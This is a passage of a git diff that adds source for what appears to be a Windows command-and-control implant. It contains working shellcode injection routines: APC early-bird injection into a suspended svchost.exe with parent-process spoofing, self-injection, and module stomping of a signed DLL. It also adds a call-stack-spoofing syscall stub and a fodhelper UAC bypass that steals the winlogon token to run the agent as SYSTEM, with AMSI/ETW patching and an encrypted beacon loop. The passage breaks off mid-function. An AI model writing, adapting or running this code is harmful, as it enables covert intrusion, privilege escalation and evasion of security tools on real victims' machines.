1 + 11 (svchost.exe) — no truncation */ + snprintf(target, sizeof(target), "%s\\%s", sys32, svc_name); + SecureZeroMemory(svc_name, sizeof(svc_name)); + + /* PPID spoof: appear to be a child of explorer.exe, not the agent */ + typedef BOOL(WINAPI * InitPTA_t)(LPPROC_THREAD_ATTRIBUTE_LIST, DWORD, DWORD, PSIZE_T); + typedef BOOL(WINAPI * UpdatePTA_t)(LPPROC_THREAD_ATTRIBUTE_LIST, DWORD, DWORD_PTR, PVOID, SIZE_T, PVOID, PSIZE_T); + typedef void(WINAPI * DelPTA_t)(LPPROC_THREAD_ATTRIBUTE_LIST); + + char _ipta[34], _upta[26], _dpta[30]; + HMODULE hk32; + { + EVS_D(_ipta, EVS_fn_InitializeProcThreadAttributeList); + EVS_D(_upta, EVS_fn_UpdateProcThreadAttribute); + EVS_D(_dpta, EVS_fn_DeleteProcThreadAttributeList); + char _ks[14]; + EVS_D(_ks, EVS_dll_kernel32); + hk32 = _peb_module(_ks); + SecureZeroMemory(_ks, sizeof(_ks)); + } + InitPTA_t fn_init = hk32 ? (InitPTA_t)GetProcAddress(hk32, _ipta) : NULL; + UpdatePTA_t fn_upd = hk32 ? (UpdatePTA_t)GetProcAddress(hk32, _upta) : NULL; + DelPTA_t fn_del = hk32 ? (DelPTA_t)GetProcAddress(hk32, _dpta) : NULL; + + HANDLE hParent = NULL; + LPPROC_THREAD_ATTRIBUTE_LIST pAttrList = NULL; + SIZE_T attrListSz = 0; + + BOOL ppid_ok = FALSE; + if (fn_init && fn_upd && fn_del) + { + DWORD explorer_pid = _find_explorer(); + if (explorer_pid) + { + hParent = inject_nt_open_process(explorer_pid, + 0x0080 /* PROCESS_CREATE_PROCESS */); + } + if (hParent) + { + fn_init(NULL, 1, 0, &attrListSz); + pAttrList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc( + GetProcessHeap(), 0, attrListSz); + if (pAttrList && fn_init(pAttrList, 1, 0, &attrListSz)) + { + /* PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000 */ + if (fn_upd(pAttrList, 0, 0x00020000, + &hParent, sizeof(HANDLE), NULL, NULL)) + ppid_ok = TRUE; + } + } + } + + STARTUPINFOEXA siex = {0}; + PROCESS_INFORMATION pi = {0}; + siex.StartupInfo.cb = sizeof(siex); + DWORD cflags = CREATE_SUSPENDED | CREATE_NO_WINDOW; + + if (ppid_ok) + { + siex.lpAttributeList = pAttrList; + cflags |= EXTENDED_STARTUPINFO_PRESENT; + } + + if (!CreateProcessA(target, NULL, NULL, NULL, FALSE, + cflags, NULL, NULL, + (LPSTARTUPINFOA)&siex, &pi)) + { + if (pAttrList) + { + fn_del(pAttrList); + HeapFree(GetProcessHeap(), 0, pAttrList); + } + if (hParent) + CloseHandle(hParent); + return -2; + } + + if (pAttrList) + { + fn_del(pAttrList); + HeapFree(GetProcessHeap(), 0, pAttrList); + } + if (hParent) + CloseHandle(hParent); + + /* Allocate RW shellcode region in remote process */ + HANDLE hproc = pi.hProcess; + PVOID base = NULL; + SIZE_T sz = sc_len; + + NTSTATUS st = inj_sc(s_ssn[SSN_ALLOC], + (uintptr_t)hproc, (uintptr_t)&base, 0, (uintptr_t)&sz, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, 0, 0, 0, 0, 0); + if (st) + { + TerminateProcess(hproc, 0); + CloseHandle(pi.hThread); + CloseHandle(hproc); + return -3; + } + + /* Write shellcode */ + SIZE_T nw = 0; + st = inj_sc(s_ssn[SSN_WRITE], + (uintptr_t)hproc, (uintptr_t)base, (uintptr_t)sc, (uintptr_t)sc_len, + (uintptr_t)&nw, 0, 0, 0, 0, 0, 0); + if (st || nw != sc_len) + { + TerminateProcess(hproc, 0); + CloseHandle(pi.hThread); + CloseHandle(hproc); + return -4; + } + + /* Flip RW → RX — no RWX window */ + ULONG old_prot; + sz = sc_len; + st = inj_sc(s_ssn[SSN_PROT], + (uintptr_t)hproc, (uintptr_t)&base, (uintptr_t)&sz, + PAGE_EXECUTE_READ, (uintptr_t)&old_prot, 0, 0, 0, 0, 0, 0); + if (st) + { + TerminateProcess(hproc, 0); + CloseHandle(pi.hThread); + CloseHandle(hproc); + return -5; + } + + /* Queue APC targeting the main thread (currently suspended) */ + st = inj_sc(s_ssn[SSN_APC], + (uintptr_t)pi.hThread, (uintptr_t)base, 0, 0, 0, 0, 0, 0, 0, 0, 0); + if (st) + { + TerminateProcess(hproc, 0); + CloseHandle(pi.hThread); + CloseHandle(hproc); + return -6; + } + + /* resume — APC fires during ntdll init before EDR hooks install */ + _rt(pi.hThread); + + CloseHandle(pi.hThread); + CloseHandle(hproc); + return 0; +} + +/* inject shellcode into current process */ +int inject_self(const BYTE *sc, SIZE_T sc_len) +{ + if (!sc || !sc_len || !_init()) + return -1; + + HANDLE self = (HANDLE)(LONG_PTR)-1; /* NtCurrentProcess */ + PVOID base = NULL; + SIZE_T sz = sc_len; + + /* alloc RW, no RWX */ + NTSTATUS st = inj_sc(s_ssn[SSN_ALLOC], + (uintptr_t)self, (uintptr_t)&base, 0, (uintptr_t)&sz, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, 0, 0, 0, 0, 0); + if (st) + return -3; + + /* write directly, same address space */ + memcpy(base, sc, sc_len); + + /* RW → RX */ + ULONG old_prot; + sz = sc_len; + st = inj_sc(s_ssn[SSN_PROT], + (uintptr_t)self, (uintptr_t)&base, (uintptr_t)&sz, + PAGE_EXECUTE_READ, (uintptr_t)&old_prot, 0, 0, 0, 0, 0, 0); + if (st) + return -5; + + /* Thread in current process */ + HANDLE hthread = NULL; + st = inj_sc(s_ssn[SSN_THREAD], + (uintptr_t)&hthread, THREAD_ALL_ACCESS, 0, (uintptr_t)self, + (uintptr_t)base, 0, 0, 0, 0, 0, 0); + if (st) + return -6; + + CloseHandle(hthread); + return 0; +} + +/* map a signed DLL into target and overwrite its .text with shellcode */ +int inject_stomp(DWORD pid, const BYTE *sc, SIZE_T sc_len, const char *dll_path) +{ + if (!sc || !sc_len) + return -1; + if (!_init() || !_init_stomp()) + return -1; + + /* Resolve DLL path */ + char path_buf[MAX_PATH]; + if (!dll_path || !dll_path[0]) + { + GetSystemDirectoryA(path_buf, sizeof(path_buf)); + size_t plen = strlen(path_buf); + /* xpsservices.dll: small, always present, rarely loaded */ + char _tail[18]; + _tail[0] = '\\'; + EVS_D(_tail + 1, EVS_dll_xpsservices); + size_t _tlen = strlen(_tail); + if (plen + _tlen < sizeof(path_buf)) + memcpy(path_buf + plen, _tail, _tlen + 1); + dll_path = path_buf; + } + + /* open DLL shared-read to avoid interfering with loaders */ + HANDLE hFile = CreateFileA(dll_path, + GENERIC_READ, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + return -2; + + /* Create image section (SEC_IMAGE = 0x1000000) */ + HANDLE hSection = NULL; + NTSTATUS st = inj_sc(s_ssn[SSN_CRTSEC], + (uintptr_t)&hSection, 0xF001F, 0, 0, + 0x02, 0x1000000, (uintptr_t)hFile, 0, 0, 0, 0); + CloseHandle(hFile); + if (st) + return -3; + + /* Open target process */ + HANDLE hproc = NULL; + INJ_OA oa = {sizeof(oa), NULL, NULL, 0, NULL, NULL}; + INJ_CID cid = {(HANDLE)(uintptr_t)pid, NULL}; + + st = inj_sc(s_ssn[SSN_OPEN], + (uintptr_t)&hproc, PROCESS_ALL_ACCESS, (uintptr_t)&oa, (uintptr_t)&cid, + 0, 0, 0, 0, 0, 0, 0); + if (st) + { + CloseHandle(hSection); + return -4; + } + + /* Map view into target — protection determined by image sections */ + PVOID base = NULL; + SIZE_T view_sz = 0; + st = inj_sc(s_ssn[SSN_MAPSEC], + (uintptr_t)hSection, (uintptr_t)hproc, (uintptr_t)&base, 0, + 0, 0, (uintptr_t)&view_sz, 2, 0, 0x20, 0); + CloseHandle(hSection); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -5; + } + + /* Change first sc_len bytes of view to RW for writing */ + PVOID prot_base = base; + SIZE_T prot_sz = sc_len; + ULONG old_prot; + st = inj_sc(s_ssn[SSN_PROT], + (uintptr_t)hproc, (uintptr_t)&prot_base, (uintptr_t)&prot_sz, + PAGE_READWRITE, (uintptr_t)&old_prot, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_UNMAPSEC], (uintptr_t)hproc, (uintptr_t)base, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -6; + } + + /* write shellcode over the module's .text region */ + SIZE_T nw = 0; + st = inj_sc(s_ssn[SSN_WRITE], + (uintptr_t)hproc, (uintptr_t)base, (uintptr_t)sc, (uintptr_t)sc_len, + (uintptr_t)&nw, 0, 0, 0, 0, 0, 0); + if (st || nw != sc_len) + { + inj_sc(s_ssn[SSN_UNMAPSEC], (uintptr_t)hproc, (uintptr_t)base, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -7; + } + + /* Restore RX */ + prot_base = base; + prot_sz = sc_len; + st = inj_sc(s_ssn[SSN_PROT], + (uintptr_t)hproc, (uintptr_t)&prot_base, (uintptr_t)&prot_sz, + PAGE_EXECUTE_READ, (uintptr_t)&old_prot, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_UNMAPSEC], (uintptr_t)hproc, (uintptr_t)base, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -8; + } + + /* Execute shellcode — thread starts at mapped base (stomped .text entry) */ + HANDLE hthread = NULL; + st = inj_sc(s_ssn[SSN_THREAD], + (uintptr_t)&hthread, THREAD_ALL_ACCESS, 0, (uintptr_t)hproc, + (uintptr_t)base, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_UNMAPSEC], (uintptr_t)hproc, (uintptr_t)base, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -9; + } + + CloseHandle(hthread); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return 0; +} diff --git a/agent/src/inject/inject_stub.c b/agent/src/inject/inject_stub.c new file mode 100644 index 0000000..e7e46b3 --- /dev/null +++ b/agent/src/inject/inject_stub.c @@ -0,0 +1,13 @@ +#include "inject.h" + +/* Lean-build stubs — inject capability excluded via -DLEAN. + * inject_nt_open_process is still called by getsystem/spawn/token; + * returning NULL causes those callers to fail gracefully. */ + +DWORD inject_find_target(void) { return 0; } +HANDLE inject_nt_open_process(DWORD pid, DWORD access) { (void)pid; (void)access; return NULL; } +int inject_remote(DWORD pid, const BYTE *sc, SIZE_T n) { (void)pid; (void)sc; (void)n; return -1; } +int inject_thread_hijack(DWORD pid, const BYTE *sc, SIZE_T n) { (void)pid; (void)sc; (void)n; return -1; } +int inject_earlybird(const BYTE *sc, SIZE_T n) { (void)sc; (void)n; return -1; } +int inject_self(const BYTE *sc, SIZE_T n) { (void)sc; (void)n; return -1; } +int inject_stomp(DWORD pid, const BYTE *sc, SIZE_T n, const char *dll) { (void)pid; (void)sc; (void)n; (void)dll; return -1; } diff --git a/agent/src/inject/spoof_stub.S b/agent/src/inject/spoof_stub.S new file mode 100644 index 0000000..004782a --- /dev/null +++ b/agent/src/inject/spoof_stub.S @@ -0,0 +1,34 @@ + + .text + .extern inj_sc_gadget + .extern inj_frame1 + .extern inj_frame2 + + .global inj_sc +inj_sc: + movq 0x30(%rsp), %r10 + movq 0x38(%rsp), %r11 + + subq $0x10, %rsp + + movq inj_frame2(%rip), %rax + movq %rax, 0x08(%rsp) + movq inj_frame1(%rip), %rax + movq %rax, 0x00(%rsp) + + movq %r10, 0x28(%rsp) + movq %r11, 0x30(%rsp) + + movq %rdx, %r10 + movq %r8, %rdx + movq %r9, %r8 + movq 0x38(%rsp), %r9 + + movq 0x50(%rsp), %r11 ; movq %r11, 0x38(%rsp) + movq 0x58(%rsp), %r11 ; movq %r11, 0x40(%rsp) + movq 0x60(%rsp), %r11 ; movq %r11, 0x48(%rsp) + movq 0x68(%rsp), %r11 ; movq %r11, 0x50(%rsp) + movq 0x70(%rsp), %r11 ; movq %r11, 0x58(%rsp) + + movzwl %cx, %eax + jmpq *inj_sc_gadget(%rip) diff --git a/agent/src/lifter/lifter.c b/agent/src/lifter/lifter.c new file mode 100644 index 0000000..be62e80 --- /dev/null +++ b/agent/src/lifter/lifter.c @@ -0,0 +1,373 @@ +/* + * lifter.c — minimal UAC bypass + winlogon token steal + * + * Two modes selected by first arg: + * (none) MEDIUM IL — writes fodhelper HKCU key, fires bypass + * --admin HIGH IL — enables privileges, steals winlogon token, + * spawns argv[2] (agent.exe) as SYSTEM + * + * Evasion: + * • All sensitive APIs resolved at runtime via GetProcAddress + * • API/DLL strings XOR-encoded at rest via EVS_D (per-build random key) + * • No console window (-mwindows) + * • No debug output + */ + +#include +#include "peb_walk.h" +#include "evs_strings.h" +#include +#include +#include +#include + +/* ── Dynamic API typedefs ─────────────────────────────────────────────── */ + +typedef BOOL (WINAPI *fn_OPT)(HANDLE,DWORD,PHANDLE); +typedef BOOL (WINAPI *fn_ATP)(HANDLE,BOOL,PTOKEN_PRIVILEGES,DWORD,PTOKEN_PRIVILEGES,PDWORD); +typedef BOOL (WINAPI *fn_LPV)(LPCSTR,LPCSTR,PLUID); +typedef BOOL (WINAPI *fn_DTE)(HANDLE,DWORD,LPSECURITY_ATTRIBUTES,SECURITY_IMPERSONATION_LEVEL,TOKEN_TYPE,PHANDLE); +typedef BOOL (WINAPI *fn_CTM)(HANDLE,PSID,PBOOL); +typedef BOOL (WINAPI *fn_AIS)(PSID_IDENTIFIER_AUTHORITY,BYTE,DWORD,DWORD,DWORD,DWORD,DWORD,DWORD,DWORD,DWORD,PSID*); +typedef PVOID (WINAPI *fn_FS) (PSID); +typedef BOOL (WINAPI *fn_CPWT)(HANDLE,DWORD,LPCWSTR,LPWSTR,DWORD,LPVOID,LPCWSTR,LPSTARTUPINFOW,LPPROCESS_INFORMATION); +typedef BOOL (WINAPI *fn_CPAU)(HANDLE,LPCWSTR,LPWSTR,LPSECURITY_ATTRIBUTES,LPSECURITY_ATTRIBUTES,BOOL,DWORD,LPVOID,LPCWSTR,LPSTARTUPINFOW,LPPROCESS_INFORMATION); +typedef BOOL (WINAPI *fn_SEE) (SHELLEXECUTEINFOA*); +typedef LONG (WINAPI *fn_RCK) (HKEY,LPCSTR); +typedef LONG (WINAPI *fn_RCE) (HKEY,LPCSTR,DWORD,LPCSTR,DWORD,REGSAM,LPSECURITY_ATTRIBUTES,PHKEY,LPDWORD); +typedef LONG (WINAPI *fn_RSV) (HKEY,LPCSTR,DWORD,DWORD,const BYTE*,DWORD); +typedef LONG (WINAPI *fn_RCL) (HKEY); + +typedef struct { + fn_OPT OpenProcessToken; + fn_ATP AdjustTokenPrivileges; + fn_LPV LookupPrivilegeValueA; + fn_DTE DuplicateTokenEx; + fn_CTM CheckTokenMembership; + fn_AIS AllocateAndInitializeSid; + fn_FS FreeSid; + fn_CPWT CreateProcessWithTokenW; + fn_CPAU CreateProcessAsUserW; + fn_SEE ShellExecuteExA; + fn_RCK RegDeleteKeyA; + fn_RCE RegCreateKeyExA; + fn_RSV RegSetValueExA; + fn_RCL RegCloseKey; +} api_t; + +/* ── String builders ──────────────────────────────────────────────────── */ + +static void _build_reg_path(char *out, size_t sz) +{ + char _ms[12]; + EVS_D(_ms, EVS_str_ms_settings); + snprintf(out, sz, "Software\\Classes\\%s\\Shell\\Open\\command", _ms); + SecureZeroMemory(_ms, sizeof(_ms)); +} + +static void _build_reg_root(char *out, size_t sz) +{ + char _ms[12]; + EVS_D(_ms, EVS_str_ms_settings); + snprintf(out, sz, "Software\\Classes\\%s", _ms); + SecureZeroMemory(_ms, sizeof(_ms)); +} + +static void _build_fod(char *out, size_t sz) +{ + char sys32[MAX_PATH]; + GetSystemDirectoryA(sys32, sizeof(sys32)); + char _fn[14]; + EVS_D(_fn, EVS_str_fodhelper_exe); + snprintf(out, sz, "%s\\%s", sys32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); +} + +static void _build_delexec(char *out) +{ + EVS_D(out, EVS_str_DelegateExecute); +} + +static void _build_winlogon(char *out) +{ + EVS_D(out, EVS_str_winlogon_exe); +} + +/* ── API resolution ───────────────────────────────────────────────────── */ + +static int _resolve(api_t *api) +{ + char _dl[13]; + EVS_D(_dl, EVS_dll_kernel32); + HMODULE hk32 = _peb_module(_dl); + SecureZeroMemory(_dl, sizeof(_dl)); + + EVS_D(_dl, EVS_dll_advapi32); + HMODULE had = LoadLibraryA(_dl); + SecureZeroMemory(_dl, sizeof(_dl)); + + char _sh[12]; + EVS_D(_sh, EVS_dll_shell32); + HMODULE hsh32 = LoadLibraryA(_sh); + SecureZeroMemory(_sh, sizeof(_sh)); + + if (!hk32 || !had || !hsh32) return -1; + + char _fn[25]; + +#define _R(api_field, cast, mod, evs_arr) do { \ + EVS_D(_fn, evs_arr); \ + (api_field) = (cast)(void*)GetProcAddress((mod), _fn); \ + SecureZeroMemory(_fn, sizeof(_fn)); \ +} while(0) + + _R(api->OpenProcessToken, fn_OPT, had, EVS_fn_OpenProcessToken); + _R(api->AdjustTokenPrivileges, fn_ATP, had, EVS_fn_AdjustTokenPrivileges); + _R(api->LookupPrivilegeValueA, fn_LPV, had, EVS_fn_LookupPrivilegeValueA); + _R(api->DuplicateTokenEx, fn_DTE, had, EVS_fn_DuplicateTokenEx); + _R(api->CheckTokenMembership, fn_CTM, had, EVS_fn_CheckTokenMembership); + _R(api->AllocateAndInitializeSid, fn_AIS, had, EVS_fn_AllocateAndInitializeSid); + _R(api->FreeSid, fn_FS, had, EVS_fn_FreeSid); + _R(api->CreateProcessWithTokenW, fn_CPWT, had, EVS_fn_CreateProcessWithTokenW); + _R(api->CreateProcessAsUserW, fn_CPAU, had, EVS_fn_CreateProcessAsUserW); + _R(api->ShellExecuteExA, fn_SEE, hsh32, EVS_fn_ShellExecuteExA); + _R(api->RegDeleteKeyA, fn_RCK, had, EVS_fn_RegDeleteKeyA); + _R(api->RegCreateKeyExA, fn_RCE, had, EVS_fn_RegCreateKeyExA); + _R(api->RegSetValueExA, fn_RSV, had, EVS_fn_RegSetValueExA); + _R(api->RegCloseKey, fn_RCL, had, EVS_fn_RegCloseKey); + +#undef _R + + return (api->OpenProcessToken && api->DuplicateTokenEx && + api->ShellExecuteExA && api->RegCreateKeyExA) ? 0 : -1; +} + +/* ── Helper: check if running as admin (full token) ─────────────────── */ + +static BOOL _is_admin(api_t *api) +{ + BOOL admin = FALSE; + SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY; + PSID sid = NULL; + if (api->AllocateAndInitializeSid(&nt, 2, + SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, + 0,0,0,0,0,0, &sid)) { + api->CheckTokenMembership(NULL, sid, &admin); + api->FreeSid(sid); + } + return admin; +} + +/* ── Enable four key privileges ──────────────────────────────────────── */ + +static void _enable_privs(api_t *api) +{ + HANDLE htok = NULL; + if (!api->OpenProcessToken(GetCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &htok)) + return; + + char _priv[30]; + LUID luid = {0}; + TOKEN_PRIVILEGES tp = {0}; + +#define _ENA(evs_arr) do { \ + EVS_D(_priv, evs_arr); \ + if (api->LookupPrivilegeValueA(NULL, _priv, &luid)) { \ + tp.PrivilegeCount = 1; \ + tp.Privileges[0].Luid = luid; \ + tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; \ + api->AdjustTokenPrivileges(htok, FALSE, &tp, sizeof(tp), NULL, NULL); \ + } \ + SecureZeroMemory(_priv, sizeof(_priv)); \ +} while(0) + + _ENA(EVS_str_SeDebugPrivilege); + _ENA(EVS_str_SeImpersonatePrivilege); + _ENA(EVS_str_SeAssignPrimaryTokenPrivilege); + _ENA(EVS_str_SeIncreaseQuotaPrivilege); + +#undef _ENA + CloseHandle(htok); +} + +/* ── Find winlogon.exe PID ───────────────────────────────────────────── */ + +static DWORD _winlogon_pid(void) +{ + char _wl[13]; + _build_winlogon(_wl); + + DWORD pid = 0; + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) return 0; + PROCESSENTRY32 pe = { sizeof(pe) }; + if (Process32First(snap, &pe)) do { + if (_stricmp(pe.szExeFile, _wl) == 0) { pid = pe.th32ProcessID; break; } + } while (Process32Next(snap, &pe)); + CloseHandle(snap); + return pid; +} + +/* ── Elevated path: steal winlogon token → spawn agent as SYSTEM ─────── */ + +static int _run_admin(api_t *api, const char *agent_path) +{ + _enable_privs(api); + + DWORD pid = _winlogon_pid(); + if (!pid) return -1; + + HANDLE hp = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); + if (!hp) return -1; + + HANDLE htok = NULL; + if (!api->OpenProcessToken(hp, + TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &htok)) { + CloseHandle(hp); + return -1; + } + CloseHandle(hp); + + HANDLE hdup = NULL; + SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, FALSE }; + if (!api->DuplicateTokenEx(htok, MAXIMUM_ALLOWED, &sa, + SecurityImpersonation, TokenPrimary, &hdup)) { + CloseHandle(htok); + return -1; + } + CloseHandle(htok); + + /* Convert agent path to wide */ + int wlen = MultiByteToWideChar(CP_ACP, 0, agent_path, -1, NULL, 0); + WCHAR *wpath = (WCHAR*)LocalAlloc(LMEM_ZEROINIT, (SIZE_T)wlen * sizeof(WCHAR)); + if (!wpath) { CloseHandle(hdup); return -1; } + MultiByteToWideChar(CP_ACP, 0, agent_path, -1, wpath, wlen); + + STARTUPINFOW si = { sizeof(si) }; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + PROCESS_INFORMATION pi = {0}; + + DWORD flags = CREATE_NO_WINDOW | CREATE_NEW_PROCESS_GROUP; + BOOL ok = FALSE; + + if (api->CreateProcessWithTokenW) + ok = api->CreateProcessWithTokenW( + hdup, LOGON_WITH_PROFILE, wpath, NULL, flags, + NULL, NULL, &si, &pi); + + if (!ok && api->CreateProcessAsUserW) + ok = api->CreateProcessAsUserW( + hdup, wpath, NULL, NULL, NULL, FALSE, flags, + NULL, NULL, &si, &pi); + + LocalFree(wpath); + CloseHandle(hdup); + + if (ok) { + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + } + return ok ? 0 : -1; +} + +/* ── Normal path: UAC bypass via fodhelper ms-settings hijack ────────── */ + +static int _run_bypass(api_t *api, const char *self_path, const char *agent_path) +{ + char reg_key[128], reg_root[64]; + _build_reg_path(reg_key, sizeof(reg_key)); + _build_reg_root(reg_root, sizeof(reg_root)); + + /* cmd /c start "" "self_path" --admin "agent_path" */ + char cmd_val[MAX_PATH * 2 + 64]; + snprintf(cmd_val, sizeof(cmd_val), + "cmd /c start \"\" \"%s\" --admin \"%s\"", self_path, agent_path); + + HKEY hk = NULL; + if (api->RegCreateKeyExA(HKEY_CURRENT_USER, reg_key, 0, NULL, 0, + KEY_WRITE, NULL, &hk, NULL) != ERROR_SUCCESS) + return -1; + + api->RegSetValueExA(hk, NULL, 0, REG_SZ, + (const BYTE*)cmd_val, (DWORD)(strlen(cmd_val) + 1)); + + char de[16]; + _build_delexec(de); + api->RegSetValueExA(hk, de, 0, REG_SZ, (const BYTE*)"", 1); + api->RegCloseKey(hk); + + char fod[MAX_PATH + 16]; + _build_fod(fod, sizeof(fod)); + + SHELLEXECUTEINFOA sei = { sizeof(sei) }; + /* fMask = 0: no flags, matches PrivEsc01.c — NOCLOSEPROCESS breaks auto-elevate */ + sei.lpFile = fod; + sei.nShow = SW_HIDE; + + BOOL ok = api->ShellExecuteExA(&sei); + Sleep(3000); + + /* Cleanup: delete created keys bottom-up */ + api->RegDeleteKeyA(HKEY_CURRENT_USER, reg_key); + { + char _da[13], _fn[15]; + EVS_D(_da, EVS_dll_advapi32); + HMODULE had2 = _peb_module(_da); + SecureZeroMemory(_da, sizeof(_da)); + typedef LONG (WINAPI *fn_RDT)(HKEY,LPCSTR); + fn_RDT pRDT = NULL; + if (had2) { + EVS_D(_fn, EVS_fn_RegDeleteTreeA); + pRDT = (fn_RDT)(void*)GetProcAddress(had2, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + } + if (pRDT) pRDT(HKEY_CURRENT_USER, reg_root); + } + + return ok ? 0 : -1; +} + +/* ── Entry point ─────────────────────────────────────────────────────── */ + +int WINAPI WinMain(HINSTANCE hI, HINSTANCE hP, LPSTR lpCmd, int nC) +{ + (void)hI; (void)hP; (void)lpCmd; (void)nC; + + api_t api; + if (_resolve(&api) != 0) + return 1; + + /* Parse args from command line */ + int argc = 0; + LPWSTR *argv_w = CommandLineToArgvW(GetCommandLineW(), &argc); + if (!argv_w) return 1; + + /* Convert argv[1] and argv[2] to narrow */ + char arg1[MAX_PATH] = {0}, arg2[MAX_PATH] = {0}; + if (argc >= 2) + WideCharToMultiByte(CP_ACP, 0, argv_w[1], -1, arg1, sizeof(arg1), NULL, NULL); + if (argc >= 3) + WideCharToMultiByte(CP_ACP, 0, argv_w[2], -1, arg2, sizeof(arg2), NULL, NULL); + LocalFree(argv_w); + + /* --admin "agent_path": elevated — steal winlogon token, spawn agent */ + if (strcmp(arg1, "--admin") == 0) { + if (!arg2[0]) return 1; /* agent path required */ + return _run_admin(&api, arg2) == 0 ? 0 : 1; + } + + /* "agent_path": normal — UAC bypass via fodhelper */ + if (!arg1[0]) return 1; /* agent path required */ + const char *agent_path = arg1; + + if (_is_admin(&api)) { + /* Already elevated — go straight to token steal */ + return _run_admin(&api, agent_path) == 0 ? 0 : 1; + } + + char self[MAX_PATH] = {0}; + GetModuleFileNameA(NULL, self, sizeof(self) - 1); + return _run_bypass(&api, self, agent_path) == 0 ? 0 : 1; +} diff --git a/agent/src/main.c b/agent/src/main.c new file mode 100644 index 0000000..d3aef00 --- /dev/null +++ b/agent/src/main.c @@ -0,0 +1,740 @@ +#include "beacon.h" +#include "bof.h" +#include "channels.h" +#include "commands.h" +#include "crypto.h" +#include "evasion.h" +#include "inject.h" +#include "persist.h" +#include "socks.h" +#include "adv_lazy.h" +#include "evs_strings.h" +#ifndef HTTP_ONLY +#include +#endif +#include +#include +#include +#include + +static int _cmdeq(const char *cmd, const unsigned char *enc, size_t n) { + volatile unsigned char k = EVS_KEY; + for (size_t i = 0; i < n; i++) + if ((unsigned char)cmd[i] != (unsigned char)(enc[i] ^ k)) return 0; + return cmd[n] == '\0'; +} + +static void agent_run(void) +{ + /* Read gs_flag at the very first instruction — before any slow init (evasion, + * curl, crypto). The parent polls this file after the UAC bypass fires; the + * narrower the window between agent start and flag deletion, the more reliable + * the detection. Store the result and act on it after full init below. */ + int _gs_triggered = agent_read_gs_flag(); + + evasion_stomp_header(); + +#ifndef SKIP_EVASION + evasion_unhook_ntdll(); + evasion_patch_etw(); + evasion_patch_amsi(); + evasion_patch_etw_ti(); +#endif + +#ifndef HTTP_ONLY + curl_global_init(CURL_GLOBAL_DEFAULT); +#endif + + agent_ctx_t agent; + channel_config_t cfg; + + int init_rc = agent_init(&agent); + if (init_rc != 0) + goto done; + channel_config_init(&cfg); + + /* auto-getsystem: flag was consumed above, now escalate with a live context */ + if (_gs_triggered) { + char _gs[4096] = {0}; + cmd_getsystem(NULL, _gs, sizeof(_gs)); + agent_get_username(agent.username, sizeof(agent.username)); + agent_get_privileges(agent.privileges, sizeof(agent.privileges)); + beacon_append_output(&agent, _gs, strlen(_gs)); + } + + /* phase 1: handshake */ + while (!agent.handshake_done) + { + /* send our public key */ + char *hs_pkt = beacon_build_handshake(&agent); + if (hs_pkt) + { + channel_send(&cfg, agent.agent_id, hs_pkt); + free(hs_pkt); + } + + /* poll for server public key */ + char *resp = channel_recv(&cfg, agent.agent_id); + if (resp) + { + char cmd[32] = {0}, args[4096] = {0}, task_id[64] = {0}; + char *data = NULL; + beacon_parse_response(&agent, resp, + cmd, sizeof(cmd), + args, sizeof(args), + task_id, sizeof(task_id), + &data); + free(data); + free(resp); + } + + if (!agent.handshake_done) + beacon_sleep(); /* jittered interval between handshake retries */ + } + + /* phase 2: main beacon loop */ + for (;;) + { + /* build and send encrypted beacon */ + char *pkt = beacon_build(&agent); + if (pkt) + { + if (channel_send(&cfg, agent.agent_id, pkt) == CHANNEL_OK) + { + /* beacon sent, clear output buffer */ + beacon_clear_output(&agent); + } + free(pkt); + } + + /* receive pending task */ + char *raw = channel_recv(&cfg, agent.agent_id); + if (raw) + { + char cmd[32] = {0}; + char args[4096] = {0}; + char task_id[64] = {0}; + char *data = NULL; + + int parse_ok = beacon_parse_response(&agent, raw, + cmd, sizeof(cmd), + args, sizeof(args), + task_id, sizeof(task_id), + &data); + free(raw); + + if (parse_ok == 0 && cmd[0] != '\0') + { + /* store task_id for ACK in next beacon */ + snprintf(agent.last_task_id, sizeof(agent.last_task_id), "%s", task_id); + + char *output = (char *)calloc(1, OUTPUT_BUF_SIZE); + if (!output) { free(data); continue; } + int ret = -1; + 